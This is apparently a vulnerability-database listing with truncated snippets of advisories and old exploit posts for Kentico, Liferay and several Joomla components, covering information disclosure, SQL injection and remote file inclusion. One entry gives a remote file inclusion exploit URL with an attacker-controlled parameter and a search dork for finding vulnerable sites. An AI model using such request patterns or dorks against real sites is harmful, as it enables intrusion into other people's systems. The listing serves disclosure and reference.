PT-2025-52296

An information disclosure vulnerability in Kentico Xperience allows authenticated users to view sensitive system objects through the live site widget properties dialog. Attackers can exploit this vulnerability to access unauthorized system information without proper access controls...

CVE-2025-43792

CVE-2025-43792 affects Liferay Portal 7.4.0–7.4.3.105 and older unsupported versions, and Liferay DXP 2023.Q4.0/2023.Q3.x, where the live-site remote address is not reliably obtained from the database. This allows remote authenticated users to exfiltrate data to an attacker-controlled server via ...

Joomla Digifolio 1.52 SQL Injection

Joomla Component comdigifolio 1.52 id SQL Injection Vulnerability --== Author ==-- + Author : v3n0m + Contact : v3n0m666atlivedotcom + Blog : http://0wnage.wordpress.com/ + Group : YOGYACARDERLINK + Site : http://yogyacarderlink.web.id/ + Date : August, 27th 2009 INDONESIA --== soft Info ==-- +...

Joomla! Component joom12pic 1.0 - Remote File Inclusion

Joom!12Pic Component RFI Bug in : /administrator/components/comjoom12pic/admin.joom12pic.php?mosConfiglivesite= Variable : $mosConfiglivesite Dork: "comjoom12pic" Example: http://xxx.net/administrator/components/comjoom12pic/admin.joom12pic.php?mosConfiglivesite=attacker Greets to all...

Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications =================================================================== Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability =================================================================== Joomla Flash Fun! Component RFI Bug...